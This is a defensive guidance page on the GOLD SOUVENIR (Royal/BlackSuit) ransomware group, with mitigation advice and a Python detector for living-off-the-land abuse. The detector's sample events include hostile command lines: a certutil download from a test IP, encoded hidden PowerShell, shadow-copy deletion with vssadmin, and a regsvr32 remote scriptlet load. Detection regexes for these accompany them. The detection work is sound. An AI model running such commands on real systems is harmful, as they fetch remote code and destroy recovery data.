How to detect and mitigate GOLD SOUVENIR attacks
GOLD SOUVENIR is a financially motivated cybercrime group that carries out ransomware and data extortion attacks. The group operated the Royal ransomware scheme until mid-2023 and has since rebranded as BlackSuit (also written Black Suit).
The best protection against ransomware attacks comes from following the essentials of cyber defense:
Monitoring and detection - Comprehensive monitoring and detection across endpoints, networks, and cloud resources can identify and stop attacks before they take hold.
Incident response plan - Create an incident response plan and rehearse and test it regularly. Store it where it will still be reachable after a ransomware attack; a copy that lives only on a file server that may itself be encrypted is of no use.
Network segmentation - Flat networks make it easy for threat actors like GOLD SOUVENIR to move laterally once they gain access. Segmentation limits lateral movement and the reach of any single compromised host or credential.
Strong passwords and phishing-resistant multi-factor authentication (MFA) - Public-facing applications and services that are not protected with MFA are an open door for threat actors holding stolen credentials. MFA can stop their progress, especially phishing-resistant implementations (such as FIDO2/WebAuthn authenticators) that protect against adversary-in-the-middle attacks. Coverage should be comprehensive, leaving no accounts unprotected, including administrative, remote-access and service accounts.
Living-off-the-land detection - Monitor for unusual use of legitimate and native tools so that living-off-the-land techniques do not go undetected. Baseline normal administrative use of these tools so that deviations in who runs them, from where, and with which arguments stand out.
Prompt patching - Patch promptly to minimize exposure to ransomware and other attacks. Internet-facing devices and systems deserve priority, because they are exposed to anyone who can reach them.
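As an added example, not Secureworks code and not a description of GOLD SOUVENIR's tooling, the following Python sketch shows the kind of check the living-off-the-land advice above implies. It reads constructed process-creation events shaped like a simplified JSON rendering of Windows Security event 4688 and flags generic abuse patterns for native tools (certutil, regsvr32, mshta, bitsadmin, wmic, vssadmin, encoded PowerShell) plus Office applications spawning script hosts. The field names, hosts, users, addresses and the rule set are assumptions for illustration.

```python
"""
Living-off-the-land (LotL) detection over process-creation events.

Added example for this page, not Secureworks code. It assumes a simplified JSON
rendering of Windows Security event 4688 (one event per line, fields: host, user,
parent, image, cmdline). The rules are generic LotL patterns for common native
tools; they are not a profile of any particular threat group.
"""
import json
import ntpath
import re
from collections import Counter

# Constructed sample events: hypothetical hosts and users, IPs from TEST-NET ranges.
# The -enc argument is a placeholder token, not a real payload.
SAMPLE_EVENTS = r"""
{"host":"ws01","user":"ACME\\jdoe","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe C:\\Users\\jdoe\\notes.txt"}
{"host":"ws01","user":"ACME\\jdoe","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQBy"}
{"host":"ws02","user":"ACME\\svc_backup","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\\ProgramData\\a.txt"}
{"host":"ws02","user":"ACME\\svc_backup","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -verifystore My"}
{"host":"srv01","user":"NT AUTHORITY\\SYSTEM","parent":"C:\\Windows\\System32\\services.exe","image":"C:\\Windows\\System32\\svchost.exe","cmdline":"svchost.exe -k netsvcs -p"}
{"host":"srv01","user":"ACME\\admin2","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\vssadmin.exe","cmdline":"vssadmin.exe delete shadows /all /quiet"}
{"host":"ws03","user":"ACME\\mlee","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"}
"""

# (rule name, regex applied to the lower-cased command line)
COMMANDLINE_RULES = [
    ("certutil used to download or decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*(?:-urlcache|-decode|-decodehex)")),
    ("powershell with encoded or hidden-window arguments",
     re.compile(r"\bpowershell(?:\.exe)?\b.*(?:\s-e(?:nc|ncodedcommand)?\s|\s-w(?:indowstyle)?\s+hidden)")),
    ("regsvr32 loading a remote scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*(?:/i:https?://|scrobj\.dll)")),
    ("mshta executing remote content",
     re.compile(r"\bmshta(?:\.exe)?\b.*https?://")),
    ("bitsadmin used to transfer files",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer")),
    ("wmic used to create a process",
     re.compile(r"\bwmic(?:\.exe)?\b.*process\s+call\s+create")),
    ("volume shadow copies deleted",
     re.compile(r"(?:\bvssadmin(?:\.exe)?\b.*delete\s+shadows|\bwmic(?:\.exe)?\b.*shadowcopy\s+delete)")),
]

# Parent/child pairing that legitimate document editing almost never produces.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list = no finding)."""
    hits = []
    cmdline = event.get("cmdline", "").lower()
    for name, pattern in COMMANDLINE_RULES:
        if pattern.search(cmdline):
            hits.append(name)
    parent, image = basename(event.get("parent", "")), basename(event.get("image", ""))
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append(f"office application ({parent}) spawned {image}")
    return hits


def scan(events_jsonl: str) -> list[dict]:
    """Parse one JSON event per line and emit one finding per tripped rule."""
    findings = []
    for line in events_jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            findings.append({"host": event["host"], "user": event["user"],
                             "rule": rule, "cmdline": event["cmdline"]})
    return findings


def summarize(findings: list[dict]) -> Counter:
    """Findings per host, so the noisiest machines reach the triage queue first."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f['host']}] {f['user']}: {f['rule']}\n    {f['cmdline']}")
    print("per-host:", dict(summarize(results)))
```

Note the two certutil events on ws02: the download with -urlcache is flagged while the -verifystore invocation is not, which is the point of matching on arguments and parent/child context rather than on the binary name alone. In production the constants would be replaced by a baseline of normal administrative use per host and account, and the findings would be fed to the SIEM rather than printed.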